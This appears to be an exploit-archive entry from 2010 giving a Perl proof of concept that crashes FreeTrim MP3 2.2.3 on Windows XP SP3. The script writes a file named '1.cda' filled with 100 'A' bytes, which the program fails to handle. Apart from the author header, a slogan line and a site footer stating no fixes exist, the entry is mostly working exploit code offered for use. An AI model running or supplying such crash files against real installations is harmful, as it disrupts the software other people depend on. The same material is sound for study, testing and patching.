FreeTrim MP3 2.2.3 Denial of Service Vulnerability

2010-12-02 11:15:11

####Exploit Title: FreeTrim MP3 Local Crash PoC
####Software Link: http://www.freetrimmp3.com/downloads/FreeTrimMP3.exe
####Tested on: Win XP SP3
####Date: 02-12-2010
####Author: h1ch4m
####Email: [email protected]

################################################
############# sahra dyalna o jazayrya khotna
################################################

my $file= "1.cda";
my $junk = "\x41" x 100;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.